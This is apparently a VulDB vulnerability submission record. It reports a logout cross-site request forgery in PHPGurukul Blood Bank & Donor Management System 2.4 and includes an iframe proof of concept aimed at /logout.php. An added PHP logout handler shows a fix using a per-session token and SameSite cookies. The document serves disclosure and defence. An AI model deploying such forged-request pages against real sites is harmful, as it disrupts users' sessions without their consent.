| Field | Value |
|---|---|
| Title | https://phpgurukul.com/ Blood Bank & Donor Management System v2.4 CSRF Improper Input Validation |
| Description | There is no CSRF token, which allows an attacker to trigger any action, including logout. An attacker can embed an iframe that points to the logout URL and send it to the victim. If the victim clicks on the link, they will automatically get logged out. The submitted proof of concept is shown below the table. |
| User | Lo1x (UID 79468) |
| Submission | 25.12.2024 16:23 (1 year ago) |
| Moderation | 25.12.2024 19:24 (3 hours later) |
| Status | Accepted |
| VulDB Entry | 289318 [PHPGurukul Blood Bank & Donor Management System 2.4 /logout.php Cross Site Request Forgery] |
| Points | 17 |

Proof of concept from the submission:

```html
<html>
<body>
<iframe
    src="http://localhost/bbdms/logout.php"
    style="border:0px #FFFFFF none;"
    name="myLogoutFrame"
    scrolling="no"
    frameborder="1"
    marginheight="0px"
    marginwidth="0px"
    height="400px"
    width="600px"
    allowfullscreen>
</iframe>
</body>
</html>
```
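For comparison, an added example of how a logout handler can be written so that a request loaded from a third-party page (as in the iframe above) has no effect; this is illustrative code, not the PHPGurukul project's own logout.php, and the session key, the `csrf_token` field name and the `index.php` redirect target are assumptions.

```php
<?php
// Added example (not the project's code): a logout.php that only acts on a
// same-site POST carrying a per-session token. Session key, field name
// 'csrf_token' and the redirect target are assumptions.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]); // PHP >= 7.3
session_start();

// One random token per session, generated on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; an empty expected token never validates.
function csrf_valid(string $submitted, string $expected): bool
{
    return $expected !== '' && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    // A GET (what <iframe src=...> or <img src=...> issues) only renders a
    // confirmation form carrying the token; it never ends the session.
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    echo '<form method="post" action="logout.php">'
       . '<input type="hidden" name="csrf_token" value="' . $token . '">'
       . '<button type="submit">Logout</button></form>';
    exit;
}

$submitted = (string) ($_POST['csrf_token'] ?? '');
$expected  = (string) ($_SESSION['csrf_token'] ?? '');
if (!csrf_valid($submitted, $expected)) {
    http_response_code(403);
    exit('Request rejected: missing or invalid CSRF token');
}

// Valid same-site POST with a matching token: end the session.
$_SESSION = [];
session_destroy();
header('Location: index.php');
exit;
```

The `SameSite=Lax` cookie attribute stops the browser from attaching the session cookie to a cross-site POST in the first place; the token check covers clients that do not honour it.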